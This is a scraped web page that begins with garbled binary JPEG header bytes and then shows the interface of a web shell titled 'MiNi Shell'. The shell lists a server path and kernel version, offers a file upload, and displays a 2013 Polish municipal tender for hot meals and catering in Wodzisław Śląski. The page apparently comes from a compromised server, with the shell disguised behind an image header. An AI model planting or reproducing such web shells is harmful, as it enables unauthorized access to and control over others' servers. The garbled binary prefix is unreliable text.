JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130613/110979-N-2013.html

<p class="kh_header"><b>Wodzisław Śląski: Dożywianie dzieci i osób dorosłych na terenie Gminy Wodzisław Śląski</b><br>
<b>Numer ogłoszenia: 110979 - 2013; data zamieszczenia: 13.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Kubsza 28, 44-300 Wodzisław Śląski, woj. śląskie, tel. 032 4556200, faks 032 4556200.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mops.wodzislaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dożywianie dzieci i osób dorosłych na terenie Gminy Wodzisław Śląski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dożywianie (przygotowanie i wydawanie posiłków) dzieci i osób dorosłych na terenie Gminy Wodzisław Śląski  w postaci 1 gorącego posiłku od poniedziałku do piątku. Szczegółowy opis przedmiotu zamówienia określa punkt III SIWZ - Zadanie I.
Przedmiotem zamówienia jest dożywianie dzieci i osób dorosłych dorosłych na terenie Gminy Wodzisław Śląski w postaci 1 gorącego posiłku - catering. Usługa będzie polegała na przygotowaniu i dostarczeniu posiłków do mieszkań osób uprawnionych zgodnie z wykazem, na obszarze dzielnicy: Jedłownik Osiedle, Jedłownik -  Turzyczka - Karkoszka, Kokoszyce, Nowe Miasto, Osiedle XXX - lecia - Piastów - Dabrówki, Radlin II, Stare Miasto, Wilchwy, Zawada.
Dożywianie odbywać się będzie od poniedziałku do piątku w godzinach pomiędzy 10:00, a 15:00. Szczegółowy opis przedmiotu zamówienia określa punkt III SIWZ - Zadanie II..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>20% zamówienia podstawowego polegającego na przygotowaniu i wydawaniu oraz dostarczaniu gorących posiłków</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 55.52.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje lub będzie dysponował: - lokalem, w którym będą przygotowywane i wydawane posiłki, spełniającym wymogi stosownie do przedmiotu zamówienia, zgodnie z obowiązującymi przepisami - dotyczy części I . - lokalem, w którym będą przygotowywane posiłki i pojazdem przystosowanym do przewozu żywności, spełniającym wymogi stosownie do przedmiotu zamówienia zgodnie z obowiązującymi przepisami- dotyczy części II zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.wodzislaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Wodzisławiu Śląskim ul. Kubsza 28, 44-300 Wodzisław Śląski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2013 godzina 07:30, miejsce: Miejski Ośrodek Pomocy Społecznej w Wodzisławiu Śląskim ul. Kubsza 28, 44-300 Wodzisław Śląski - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dożywianie (przygotowanie i wydawanie posiłków) dzieci i osób dorosłych na terenie Gminy Wodzisław Śląski  w postaci 1 gorącego posiłku od poniedziałku do piątku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dożywianie (przygotowanie i wydawanie posiłków) dzieci i osób dorosłych na terenie Gminy Wodzisław Śląski  w postaci 1 gorącego posiłku od poniedziałku do piątku.
Przez jeden gorący  posiłek  Zamawiający rozumie:
zupa z wkładką gramatura 350g
lub
 pierogi
bigos
bogracz
fasolka po bretońsku
dodatek w postaci chleba
Gramatura 350 g
lub
tak zwane drugie danie w postaci:
       wkładu mięsnego lub ryby np.
- gulaszu;
  - potrawki z kurczaka;
       - klopsików;
       - kotletu schabowego;        
       - kotletu z piersi z kurczaka;
       - kotletu z pieczarami;
       - ryby w panierce lub bez itp.
       Gramatura wkładu mięsnego lub rybnego 150g. 
      Dodatki do mięsa :
       a) w postaci:
       - ziemniaków;
       - kaszy;
       - klusek;
       - makaronu
  Gramatura  150g.
  b) dodatek w postaci surówki gramatura  wynosi 50 g.
Posiłki powinny być przygotowane zgodnie z zasadami racjonalnego żywienia, muszą być zróżnicowane, sporządzane z pełnowartościowych produktów z uwzględnieniem sezonowości ich występowania. Posiłki muszą charakteryzować się wysoką jakością, posiadać właściwe walory smakowe i estetyczne oraz właściwą temperaturę.
Tygodniowy jadłospis powinien zawierać nie mniej niż  3 posiłki w postaci drugiego dania.
Wykonawca zobowiązany jest do przygotowania na każdy dzień tygodnia innego posiłku.
Jadłospis na miesiąc następny należy przedłożyć w Miejskim Ośrodku Pomocy Społecznej
z tygodniowym wyprzedzeniem w celu akceptacji przez Dyrektora.
2.  Przewiduje się, że średnia miesięczna ilość wydanych posiłków wyniesie 1760 sztuk, tj. średnio 80 sztuk posiłków dziennie.                                                           
Zamawiający zastrzega, iż ilość wydawanych posiłków może zmieniać się w trakcie obowiązywania umowy (zwiększyć lub zmniejszyć się).
Zamawiający będzie przekazywał Wykonawcy listy osób uprawnionych do odbioru gorącego posiłku. Pierwszą listę przekaże na 3 dni kalendarzowe przed terminem realizacji zamówienia.  W przypadku zmian lista będzie aktualizowana  do godz 10:00 dnia następnego.
Wykonawca  zobowiązany jest do uzyskania na liście o której mowa powyżej, potwierdzenia osoby, której posiłek będzie wydany poprzez jej czytelny podpis.
Wykonawca zobowiązany jest do wydawania posiłków w dni robocze od poniedziałku do piątku od 12:00 do 16:00. W przypadku, gdy wszystkie osoby z przekazanej listy odbiorą posiłek, Zamawiający zezwala na wcześniejsze zamknięcie jadłodajni.  
Wykonawca zobowiązany jest do zakazu sprzedaży  i podawania alkoholu w czasie wydawania 
posiłków dla klientów Ośrodka  tj. od godz. 12:00  do godz. 16:00
						   
3. Termin wykonania zamówienia: w okresie od 1 lipca 2013r. lub od 5 dnia roboczego po podpisaniu umowy, jeżeli podpisanie umowy nastąpi po 1 lipca 2013 r.                                                                 do 31 grudnia 2013r. lub do wykorzystania kwoty umowy.
4. Miejsce realizacji zamówienia:
1) Wykonawca zobowiązany jest do realizacji zamówienia na terenie miasta Wodzisławia Śląskiego 
2) Wykonawca zobowiązany jest do zapewnienia odpowiednich warunków lokalowych umożliwiających spożycie posiłku, w szczególności miejsc siedzących przy stoliku
( bez wyodrębniania miejsc wskazujących na szczególny sposób traktowania).
5. Wykonawca ponosi odpowiedzialność wobec osób trzecich, za szkody powstałe  w związku
z realizacją umowy,  w szczególności spowodowane zatruciami pokarmowymi. 
6. Wykonawca zobowiązany jest do ponoszenia odpowiedzialność prawnej i materialnej wobec organów kontroli (stacji sanitarno-epidemiologicznej, PIP, BHP) w zakresie wykonywanej usługi w tym m.in. w zakresie jakości produktów i przygotowania posiłków  w zakresie wymagań higieniczno-sanitarnych.
7. Rozliczenia finansowe z Wykonawcą będą odbywały się w miesięcznych okresach rozliczeniowych na podstawie  wydanych posiłków w tym okresie, które polegać będą na:
1) sprawdzeniu list  potwierdzających codzienną ilość wydawanych  gorących posiłków
2) przemnożeniu ilości wydanych gorących posiłków przez cenę jednego gorącego posiłku wynikającą z oferty przetargowej. 
3) Zamawiający zobowiązuje się do przekazywania należności za wydane gorące posiłki w ciągu 14 dni od otrzymania faktury VAT  przelewem na konto Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dożywianie dzieci i osób dorosłych dorosłych na terenie Gminy Wodzisław Śląski w postaci 1 gorącego posiłku - catering.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dożywianie dzieci i osób dorosłych dorosłych na terenie Gminy Wodzisław Śląski w postaci 1 gorącego posiłku - catering. Usługa będzie polegała na przygotowaniu i dostarczeniu posiłków do mieszkań osób uprawnionych zgodnie z wykazem, na obszarze dzielnicy: Jedłownik Osiedle, Jedłownik -  Turzyczka - Karkoszka, Kokoszyce, Nowe Miasto, Osiedle XXX - lecia - Piastów - Dabrówki, Radlin II, Stare Miasto, Wilchwy, Zawada.
Dożywianie odbywać się będzie od poniedziałku do piątku w godzinach pomiędzy 10:00, a 15:00. 
Przez jeden gorący  posiłek  Zamawiający rozumie:
zupa z wkładką gramatura 350g
lub
 pierogi                                                        
bigos
bogracz
			
fasolka po bretońsku
dodatek w postaci chleba						
Gramatura 350 g
lub
tak zwane drugie danie w postaci:
      1/ wkładu mięsnego lub ryby np:
- gulaszu;
  - potrawki z kurczaka;
       - klopsików;
       - kotletu schabowego;
       - kotletu z piersi z kurczaka;
       - kotletu z pieczarami;
       - ryby w panierce lub bez itp.
       Gramatura wkładu mięsnego lub rybnego 150g.
       2/ Dodatki do mięsa :
       a) w postaci:
       - ziemniaków;
       - kaszy;
       - klusek;
       - makaronu;
  Gramatura  150g.
  b) dodatek w postaci surówki gramatura  wynosi 50 g.
Posiłki powinny być przygotowane zgodnie z zasadami racjonalnego żywienia, muszą być zróżnicowane, sporządzane z pełnowartościowych produktów z uwzględnieniem sezonowości ich występowania. Posiłki muszą charakteryzować się wysoką jakością, posiadać właściwe walory smakowe i estetyczne oraz właściwą temperaturę.
Obiad dla każdej osoby powinien być podany na ciepło w pojemniku termoizolacyjnym
z kompletem sztućców jednorazowych i serwetek. Obiad ma być dostarczony  jako wyporcjowany.
Zamawiający nie dopuszcza, aby w ciągu jednego tygodnia wystąpiła powtarzalność tego samego zestawu obiadowego.
2. Przewiduje się, że średnia miesięczna ilość dostarczonych posiłków wyniesie 440 sztuk, tj. średnio 20 sztuk posiłków dziennie.  
Zamawiający zastrzega, iż ilość dostarczonych posiłków może zmieniać się w trakcie obowiązywania umowy (zwiększyć lub zmniejszyć się).
						
Zamawiający będzie przekazywał Wykonawcy listy osób uprawnionych do odbioru gorącego
posiłku. Pierwszą listę przekaże na 3 dni kalendarzowe przed terminem realizacji zamówienia.
W przypadku zmian lista będzie aktualizowana z co najmniej dwudniowym wyprzedzeniem.
Wykonawca  zobowiązany jest do uzyskania na liście o której mowa powyżej, potwierdzenia osoby, której posiłek będzie dostarczony poprzez jej czytelny podpis.
3. Termin wykonania zamówienia: w okresie od 1 lipca 2013r. lub od 5 dnia roboczego po podpisaniu umowy, jeżeli podpisanie umowy nastąpi po 1 lipca 2013 r.                                                                 do 31 grudnia 2013r. lub do wykorzystania kwoty umowy.
4. Wykonawca odpowiada za transport oraz dostarczenie na miejsce dostawy przedmiotu zamówienia oraz podanie go zgodnie z wymaganiami sanitarnymi dotyczącymi żywności
i żywienia.
5.Wykonawca ponosi odpowiedzialność wobec osób trzecich, za szkody powstałe  w związku
z realizacją umowy,  w szczególności spowodowane zatruciami pokarmowymi. 
6. Wykonawca zobowiązany jest do ponoszenia odpowiedzialność prawnej i materialnej wobec organów kontroli (stacji sanitarno-epidemiologicznej, PIP, BHP) w zakresie wykonywanej usługi w tym m.in. w zakresie jakości produktów, przygotowania i transportu posiłków posiłków w zakresie wymagań higieniczno-sanitarnych.
7. Rozliczenia finansowe z Wykonawcą będą odbywały się w miesięcznych okresach rozliczeniowych na podstawie  dostarczonych posiłków w tym okresie, które polegać będą na:
1) sprawdzeniu list  potwierdzających codzienną ilość dostarczonych  gorących posiłków
2) przemnożeniu ilości dostarczonych gorących posiłków przez cenę jednego gorącego posiłku wynikającą z oferty przetargowej. 
3) Zamawiający zobowiązuje się do przekazywania należności za dostarczone gorące posiłki w ciągu 14 dni od otrzymania faktury VAT  przelewem na konto Wykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com